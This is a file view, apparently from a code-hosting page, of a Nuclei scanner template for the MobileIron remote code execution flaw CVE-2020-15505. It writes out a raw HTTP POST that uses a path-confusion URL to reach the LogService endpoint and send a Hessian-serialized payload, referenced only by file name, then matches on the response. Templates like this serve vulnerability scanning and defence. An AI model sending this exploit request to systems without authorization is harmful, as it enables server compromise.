nuclei-templates/cves/CVE-2020-15505.yaml

28 lines
637 B
YAML
Raw Normal View History

2020-09-14 07:23:20 +00:00
id: CVE-2020-15505
info:
name: MobileIron Core & Connector <= v10.6, Sentry <= v9.8 - RCE
author: dwisiswant0
severity: critical
requests:
- payloads:
data: "payloads/CVE-2020-15505.bin"
raw:
- |
POST /mifs/.;/services/LogService HTTP/1.1
Host: {{Hostname}}
Referer: https://{{Hostname}}
Content-Type: x-application/hessian
Connection: close
{{hex_decode('630200480004')}}data
matchers-condition: and
matchers:
- type: word
words:
- "application/x-hessian"
part: header
- type: status
status:
- 200